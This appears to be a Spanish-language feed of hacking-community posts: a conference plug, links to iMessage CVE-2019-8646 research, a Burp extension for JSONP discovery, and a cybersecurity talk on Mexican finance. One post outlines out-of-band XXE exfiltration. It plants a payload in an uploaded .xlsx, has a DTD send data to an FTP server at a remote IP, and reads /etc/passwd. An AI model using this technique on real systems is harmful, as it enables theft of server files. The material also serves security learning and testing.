Recuerden no hay pretextos !! Aprender es fácil con internet a la mano </lol>

#Congreso #Hacking !! Colombia 🇨🇴

Buen Viernes !

Exfiltration through FTP using OOB XXE

Upload accepts .xlsx files --> Unzip sample .xlsx file -> add payload in workbook.xml/[Content_Types].xml after xml declaration --> DTD file send data via ftp://remote-ip/%data --> run ftp server using xxe-ftp-server.rb --> /etc/passwd

Via: https://twitter.com/_ayoubfathi_/status/1164536885244583941

CVE-2019-8646 is a vulnerability in iMessage that can allow memory to be leaked and files to be read remotely from a device.
Demo: https://youtu.be/br2xCvtVFn4
Research: https://googleprojectzero.blogspot.com/2019/08/the-many-possibilities-of-cve-2019-8646.html

jsonp is a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies.
https://github.com/kapytein/jsonp

#EnVivo Presentación del documento “Estado de la #ciberseguridad en el sistema financiero en México 🇲🇽 ”, a cargo de
@belisarioc, Gerente del Programa de Ciberseguridad, @OEA_Cyber
🎥 https://youtu.be/4eVuKnpi0IE